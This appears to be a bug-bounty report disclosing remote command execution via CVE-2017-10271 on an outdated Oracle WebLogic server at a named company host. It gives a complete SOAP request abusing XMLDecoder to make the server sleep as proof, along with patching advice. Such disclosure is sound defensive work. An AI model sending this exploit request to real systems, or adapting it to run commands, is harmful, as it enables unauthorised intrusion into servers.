Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]

##Summary Hello. I was able to identify RCE vulnerability due to the outdated Oracle Weblogic instance on `https://raebilling.mtn.co.za`. ##Steps To Reproduce * To reproduce, launch this request with BurpSuite * This request to the `https://raebilling.mtn.co.za/wls-wsat/CoordinatorPortType` will trigger sleep for 15 seconds (same applies for 20 secondes, 40 seconds): ``` POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1 Host: raebilling.mtn.co.za Content-Length: 426 content-type: text/xml Accept-Encoding: gzip, deflate, compress Accept: */* <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java class="java.beans.XMLDecoder"> <object class="java.lang.Thread" method="sleep"> <long>40000</long> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` ==**POC:**== {F736913} {F736912} {F736915} ## Suggested Mitigation/Remediation Actions * Patching WebLogic to the recent version will fix the issue. ## Impact **This vulnerability allow an unauthenticated attacker:** * To perform Remote OS Command Execution.